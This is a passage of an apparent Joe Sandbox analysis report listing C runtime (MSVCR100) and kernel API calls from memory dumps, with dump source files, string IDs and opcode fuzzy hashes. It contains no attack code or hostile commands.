                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • __p__iob.MSVCR100(6FDD8200,0000000C), ref: 6FDD8183
                                                                                                          • __p__iob.MSVCR100(6FDD8200,0000000C), ref: 6FDD819A
                                                                                                          • __p__iob.MSVCR100(?,00000000,?,6FDD8200,0000000C), ref: 6FDD81B2
                                                                                                          • __p__iob.MSVCR100(00000000,?,00000000,?,6FDD8200,0000000C), ref: 6FDD81C2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __p__iob$_errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 263866100-0
                                                                                                          • Opcode ID: 5affe92d7b1b5b359850c30a1fc335ae33a73f94cd53a7916599d2f32b3e0eee
                                                                                                          • Instruction ID: 45842e88bccf07c45fd221bb4bfecb0044d2749e7902128cc2e3ddc2caf70c0c
                                                                                                          • Opcode Fuzzy Hash: 5affe92d7b1b5b359850c30a1fc335ae33a73f94cd53a7916599d2f32b3e0eee
                                                                                                          • Instruction Fuzzy Hash: 7201A2B3D44308AAEB81BFF09C86A6E37689F017A8F155225B435DA1C0DB34FD4587B1
                                                                                                          APIs
                                                                                                          • _getptd.MSVCR100(6FDFBF98,0000000C), ref: 6FDFBEEF
                                                                                                          • _calloc_crt.MSVCR100(00000008,00000001,6FDFBF98,0000000C), ref: 6FDFBEFA
                                                                                                          • _errno.MSVCR100(6FDFBF98,0000000C), ref: 6FDFBF0A
                                                                                                          • _lock.MSVCR100(0000000C,6FDFBF98,0000000C), ref: 6FDFBF30
                                                                                                          • _lock.MSVCR100(0000000D,6FDFBF98,0000000C), ref: 6FDFBF50
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 6FDFBF60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _lock$IncrementInterlocked_calloc_crt_errno_getptd
                                                                                                          • String ID:
                                                                                                          • API String ID: 2859800741-0
                                                                                                          • Opcode ID: bf86f1abd1f54b3158b0d5a59fa37d7eebb9e8fa70f0fa17e4f225f9ed0b6e7c
                                                                                                          • Instruction ID: c0bb7ead5c532f0e7129416eb9681f607855bc56564202b86bd6f7e779d9cb0c
                                                                                                          • Opcode Fuzzy Hash: bf86f1abd1f54b3158b0d5a59fa37d7eebb9e8fa70f0fa17e4f225f9ed0b6e7c
                                                                                                          • Instruction Fuzzy Hash: 9301D431502702EAEB90AFB4D805B4C77A0AF44778F205749E0759B2C0CF75B9418B75
                                                                                                          APIs
                                                                                                          • memset.MSVCR100(?,000000FF,00000024,?,?,6FD96A18,?), ref: 6FD96A3D
                                                                                                          • _errno.MSVCR100(?,?,6FD96A18,?), ref: 6FDA9D32
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,6FD96A18,?), ref: 6FDA9D3C
                                                                                                          • _errno.MSVCR100(?,?,?,?,6FD96A18,?), ref: 6FDA9D56
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfomemset
                                                                                                          • String ID: L[o
                                                                                                          • API String ID: 4173284227-1256444177
                                                                                                          • Opcode ID: 5007584ef163fbc89311cd1340ff66987812336bb46375fcb3fbac4d2ffe1a79
                                                                                                          • Instruction ID: e678c764579230b317357743c7e5025046937099420c488f22c4e007e51f441b
                                                                                                          • Opcode Fuzzy Hash: 5007584ef163fbc89311cd1340ff66987812336bb46375fcb3fbac4d2ffe1a79
                                                                                                          • Instruction Fuzzy Hash: E96136B1A00305AFDB549FA8CC40B9E77B6EF85328F10822EF5219B2D5D776B9408B94
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(00000000,00000000,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FD95C28
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FDAA1A9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo
                                                                                                          • String ID: $
                                                                                                          • API String ID: 2959964966-3993045852
                                                                                                          • Opcode ID: 49fda4f6a094257791eea7f6bc6f4a7ed63ef16df526c4610a0540b5aaf2a7a5
                                                                                                          • Instruction ID: 514da70a49677e1d4e7d7939917c0c555563f4941d8318311eeca9551b990d37
                                                                                                          • Opcode Fuzzy Hash: 49fda4f6a094257791eea7f6bc6f4a7ed63ef16df526c4610a0540b5aaf2a7a5
                                                                                                          • Instruction Fuzzy Hash: A271353198530ACBDB91CFB8D5487EE3BB0AF0239CF10535AD8A15B194C336BAA1C795
                                                                                                          APIs
                                                                                                          • iswctype.MSVCR100(?,00000008,?,?,?,?,?,?,6FD80CD5,?,?,?,00000000), ref: 6FD80BE3
                                                                                                          • _errno.MSVCR100(?,?,?,?,6FD80CD5,?,?,?,00000000), ref: 6FD8A424
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,6FD80CD5,?,?,?,00000000), ref: 6FDAA3D3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfoiswctype
                                                                                                          • String ID: $
                                                                                                          • API String ID: 1743973646-3993045852
                                                                                                          • Opcode ID: 61afa82759853cd61d3f10f50b359bf041e57abe5136c3ff767c97159d3dcbeb
                                                                                                          • Instruction ID: 4b7c5dc051284dfda5495f8ea3452c30c8a738bb6d29ddfbe1e23bc5108dd4eb
                                                                                                          • Opcode Fuzzy Hash: 61afa82759853cd61d3f10f50b359bf041e57abe5136c3ff767c97159d3dcbeb
                                                                                                          • Instruction Fuzzy Hash: 2E51D771806719DBDBA08F68CA597DE77B4BF02398F205227E8B49B1D0D374BA90C751
                                                                                                          APIs
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,?,?,?,?,?,?,?,?,6FDBD091,?,00000000,?,00000000), ref: 6FDC29B1
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,?,?,?,?,?,?,?,?,6FDBD091,?,00000000,?,00000000), ref: 6FDC2A33
                                                                                                          • ??_V@YAXPAX@Z.MSVCR100(?,?,?,00000000,?,?,?,?,?,?,?,?,6FDBD091,?,00000000,?), ref: 6FDC2B61
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ,$,
                                                                                                          • API String ID: 0-220654547
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6FDBC6D9
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6FDBC79A
                                                                                                          • SetEvent.KERNEL32(?), ref: 6FDBC7A9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$EnterEventLeave
                                                                                                          • String ID: $$,
                                                                                                          • API String ID: 3094578987-53852779
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDFFE57: $I10_OUTPUT.MSVCR100(?,?,00000016,?,?,?,6FE00196,00000000,?,?,000000FF,00000016,?,?,000000A3,?), ref: 6FDFFE98
                                                                                                            • Part of subcall function 6FDFFE57: strcpy_s.MSVCR100(6FE00196,?,?,?,?,00000016,?,?,?,6FE00196,00000000,?,?,000000FF,00000016,?), ref: 6FDFFEB8
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6FE006F9
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6FE00700
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100(000000A3,?,?,?,?,?,?,?,?,?,000000FF,?,?,?,?,00000000), ref: 6FE00711
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(000000A3,?,?,?,?,?,?,?,?,?,000000FF,?,?,?,?,00000000), ref: 6FE00718
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$I10__invalid_parameterstrcpy_s
                                                                                                          • String ID: -
                                                                                                          • API String ID: 3497480935-2547889144
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDC035A: TlsGetValue.KERNEL32(6FDB6175), ref: 6FDC036C
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6FDCABA2
                                                                                                          • swprintf_s.MSVCR100(?,00000401,[%d:%d:%d:%d(%d)] ,00000000,?,6FDCA924,?,?,000000F8), ref: 6FDCABCC
                                                                                                          • vswprintf_s.MSVCR100(00000401,00000401,?,?,?,00000002,?,6FDCA924,?,?,000000F8), ref: 6FDCABEE
                                                                                                          • wcslen.MSVCR100(?,00000401,00000401,?,?,?,00000002,?,6FDCA924,?,?,000000F8), ref: 6FDCABF4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: CurrentThreadValueswprintf_svswprintf_swcslen
                                                                                                          • String ID: [%d:%d:%d:%d(%d)]
                                                                                                          • API String ID: 2175577827-3832470304
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD6272
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD627D
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID: B
                                                                                                          • API String ID: 340685940-1255198513
                                                                                                          APIs
                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6FDC6632
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC663F
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC6657
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000), ref: 6FDC6665
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: ??0scheduler_resource_allocation_error@Concurrency@@CreateErrorEventExceptionLastThrow
                                                                                                          • String ID: hso
                                                                                                          • API String ID: 798786809-661648116
                                                                                                          APIs
                                                                                                          • strcat_s.MSVCR100(6FD86E28,6FD86E07,6FD86E18,?,00000083,00000083,?,6FD86E1C,6FD86E07,6FD86E28,00000002,6FD86E28,6FD86E07,?,00000000,00000000), ref: 6FD84D75
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FD86E07,6FD86E28,00000002,6FD86E28,6FD86E07,?,00000000,00000000,00000005), ref: 6FDB0AC5
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDB0AD0
                                                                                                          • strcspn.MSVCR100(00000000,_.,,00000000,00000000,00000005), ref: 6FDB0ADE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _invoke_watson$strcat_sstrcspn
                                                                                                          • String ID: _.,
                                                                                                          • API String ID: 3446206939-2709443920
                                                                                                          APIs
                                                                                                          • __set_app_type.MSVCR100(00000001), ref: 00D01310
                                                                                                          • EncodePointer.KERNEL32(000000FF), ref: 00D01319
                                                                                                          • __setusermatherr.MSVCR100(Function_000016F6), ref: 00D0135B
                                                                                                          • _configthreadlocale.MSVCR100(000000FF), ref: 00D01372
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612452283.0000000000D01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D00000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: EncodePointer__set_app_type__setusermatherr_configthreadlocale
                                                                                                          • String ID: .$
                                                                                                          • API String ID: 3937316565-2223841709
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(00000000,00000000,X_o,6FDD22CA,X_o,?,?,?,00000000), ref: 6FDD215F
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,X_o,6FDD22CA,X_o,?,?,?,00000000), ref: 6FDD216A
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDD21AF
                                                                                                          • free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDD21B7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: free$_errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID: X_o
                                                                                                          • API String ID: 4554520-656684892
                                                                                                          APIs
                                                                                                          • CreateThread.KERNEL32(00000000,-00000018,6FDC0EC3,00010000,6FDC0EB1,?), ref: 6FDCAB1D
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCAB27
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDCAB3F
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000), ref: 6FDCAB4D
                                                                                                            • Part of subcall function 6FDCAA54: GetModuleHandleA.KERNEL32(00000000), ref: 6FDCAA6B
                                                                                                            • Part of subcall function 6FDCAA54: GetModuleFileNameW.KERNEL32(6FD70000,?,00000104), ref: 6FDCAA87
                                                                                                            • Part of subcall function 6FDCAA54: LoadLibraryW.KERNEL32(?), ref: 6FDCAA98
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Module$??0scheduler_resource_allocation_error@Concurrency@@CreateErrorExceptionFileHandleLastLibraryLoadNameThreadThrow
                                                                                                          • String ID: \so
                                                                                                          • API String ID: 366444775-3095705423
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,?,?,6FDF34C9,?,?,00000000,?,?,?,00000000,?,?,?), ref: 6FDF3278
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,6FDF34C9,?,?,00000000,?,?,?,00000000,?,?,?), ref: 6FDF3283
                                                                                                          • __tzname.MSVCR100(000000FF,?,?,?,?,6FDF34C9,?,?,00000000,?,?,?,00000000), ref: 6FDF32E0
                                                                                                          • _mbstowcs_s_l.MSVCR100(00000000,?,?,00000000,000000FF,?,?,?,?,6FDF34C9,?,?,00000000,?,?,?), ref: 6FDF3301
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 6FDF332C
                                                                                                          Similarity
                                                                                                          • API ID: __tzname_errno_invalid_parameter_noinfo_invoke_watson_mbstowcs_s_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 1540807873-0
                                                                                                          APIs
                                                                                                          • _strnicmp.MSVCR100(?,?,6FDD396D,?,00000109,00000000,?,6FDD396D,?,UTF-8,00000005,?,?,00000000), ref: 6FDE06FE
                                                                                                          • _errno.MSVCR100(?,00000109,00000000,?,6FDD396D,?,UTF-8,00000005,?,?,00000000), ref: 6FDE0720
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,00000109,00000000,?,6FDD396D,?,UTF-8,00000005,?,?,00000000), ref: 6FDE072B
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100(00000080,?,00000109,00000000,?,6FDD396D,?,UTF-8,00000005,?,?,00000000), ref: 6FDE074E
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000080,?,00000109,00000000,?,6FDD396D,?,UTF-8,00000005,?,?,00000000), ref: 6FDE0759
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter_strnicmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 3445316951-0
                                                                                                          APIs
                                                                                                          • _strnicmp.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDE100C
                                                                                                          Similarity
                                                                                                          • API ID: _strnicmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 2635805826-0
                                                                                                          APIs
                                                                                                          • strncmp.MSVCR100(?,?,00000000,00000080,00000080), ref: 6FDE02FE
                                                                                                          Similarity
                                                                                                          • API ID: strncmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 1114863663-0
                                                                                                          APIs
                                                                                                          • strncmp.MSVCR100(00000000,?,00000000,?,?), ref: 6FDE0C19
                                                                                                          • _errno.MSVCR100(?,?,?), ref: 6FDE0C3F
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?), ref: 6FDE0C4A
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100(?,?,?,?), ref: 6FDE0C6E
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?), ref: 6FDE0C79
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameterstrncmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 2244377858-0
                                                                                                          APIs
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(000000C0,32054ECC), ref: 6FDC6B6A
                                                                                                            • Part of subcall function 6FD8232B: malloc.MSVCR100(?), ref: 6FD82336
                                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 6FDC6C64
                                                                                                            • Part of subcall function 6FDC9684: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 6FDC96E8
                                                                                                            • Part of subcall function 6FDC9684: GetLastError.KERNEL32(?,00000000), ref: 6FDC96F5
                                                                                                            • Part of subcall function 6FDC9684: ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000,?,00000000), ref: 6FDC970D
                                                                                                            • Part of subcall function 6FDC9684: _CxxThrowException.MSVCR100(?,6FE20C48,00000000,?,00000000), ref: 6FDC971B
                                                                                                            • Part of subcall function 6FDC9684: GetLastError.KERNEL32(?,00000000), ref: 6FDC9742
                                                                                                            • Part of subcall function 6FDC9684: ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000,?,00000000), ref: 6FDC975A
                                                                                                            • Part of subcall function 6FDC9684: GetLastError.KERNEL32(?,00000000), ref: 6FDC977D
                                                                                                            • Part of subcall function 6FDC9684: ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000,?,00000000), ref: 6FDC9795
                                                                                                            • Part of subcall function 6FDB865E: memset.MSVCR100(?,00000000,0000000C,6FDB869C), ref: 6FDB8663
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC6BFC
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC6C15
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000), ref: 6FDC6C24
                                                                                                          Similarity
                                                                                                          • API ID: ??0scheduler_resource_allocation_error@Concurrency@@ErrorLast$ExceptionThrow$??2@CreateEventMultipleObjectsWaitmallocmemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1733554963-0
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: _errno_gmtime64_s$_invalid_parameter_noinfo$_get_daylight_get_dstbias_get_timezonememset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3362392949-0
                                                                                                          • Opcode ID: afdbfc881f2edbf4ece00915062a56fbc11af0d6434422701ced93e7e2a06166
                                                                                                          • Instruction ID: 65d8c9a5ed6f175e79f686cebd39051d6313cd8b55a8fdef70cf3610f67a3e70
                                                                                                          • Opcode Fuzzy Hash: afdbfc881f2edbf4ece00915062a56fbc11af0d6434422701ced93e7e2a06166
                                                                                                          • Instruction Fuzzy Hash: 65219C76A00716EADF44DFF9CC909DEB7F89F86254B104167D411EB184EB32FA4487A1
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,00000016,?,6FE001F4,00000000,?,?,0000002D,?,?,?,?,000000A3), ref: 6FDCCD3C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,00000016,?,6FE001F4,00000000,?,?,0000002D,?,?,?,?,000000A3), ref: 6FDCCD46
                                                                                                          • _errno.MSVCR100(?,00000016,?,6FE001F4,00000000,?,?,0000002D,?,?,?,?,000000A3), ref: 6FDCCD68
                                                                                                          • strlen.MSVCR100(?,?,?,00000016,?,6FE001F4,00000000,?,?,0000002D,?,?,?,?,000000A3), ref: 6FDCCDC1
                                                                                                          • memmove.MSVCR100(?,?,00000001,?,?,?,00000016,?,6FE001F4,00000000,?,?,0000002D,?,?,?), ref: 6FDCCDCA
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfomemmovestrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 4167440682-0
                                                                                                          • Opcode ID: c53472401e32b857136ec1ca63aa71b4d39a73b0ea270e84188dedf9f11b4288
                                                                                                          • Instruction ID: 11887ce3431324ff2e5bf15860c03949537fbcce1c561fde74736510031a2fd5
                                                                                                          • Opcode Fuzzy Hash: c53472401e32b857136ec1ca63aa71b4d39a73b0ea270e84188dedf9f11b4288
                                                                                                          • Instruction Fuzzy Hash: 652137757083D1DEE3A25B2888007953FAD9F47754F18859AEA814F241E670B803C7B3
                                                                                                          APIs
                                                                                                          • wcscpy_s.MSVCR100(6FE28408,0000000E,6FDB3048,6FE28448,00000012,00000000,?,6FDD8707,?,6FDD87E8,00000010,6FDD883A,00000000,?,00000002,7FFFFFFF), ref: 6FDD8591
                                                                                                          • _ultow_s.MSVCR100(00000000,6FE28408,0000000E,00000020), ref: 6FDD85DE
                                                                                                          • wcscat_s.MSVCR100(6FE28408,0000000E,6FDB3014), ref: 6FDD85F1
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDD8602
                                                                                                          Similarity
                                                                                                          • API ID: _invoke_watson_ultow_swcscat_swcscpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 1489244896-0
                                                                                                          • Opcode ID: deabe3b5ea366a6547d7470f4334d3d9579793d2cb108ff3aa04bab5ee5a155d
                                                                                                          • Instruction ID: 779dfc78ebaab56be1fa4318a1cd3feb9cece65a0fde1f2257e1c89139dc49c1
                                                                                                          • Opcode Fuzzy Hash: deabe3b5ea366a6547d7470f4334d3d9579793d2cb108ff3aa04bab5ee5a155d
                                                                                                          • Instruction Fuzzy Hash: EF113A62A4C30CE7E6970B399C46F6B37ACDF81768F446016F9189F1C1E624FA4183B1
                                                                                                          APIs
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000007,00000007,?,6FDB0814), ref: 6FDFEEDD
                                                                                                          • _calloc_crt.MSVCR100(00000000,00000001,?,00000000,?,00000007,00000007,?,6FDB0814,?,00007FFF,?,6FD91D0C,?,6FD91D28,00000010), ref: 6FDFEEE9
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00000000,?,00000007,00000007,?,6FDB0814), ref: 6FDFEF03
                                                                                                            • Part of subcall function 6FD92144: _mbschr.MSVCR100(00000000,0000003D,00000000,00000000,7650DFF0), ref: 6FD9216B
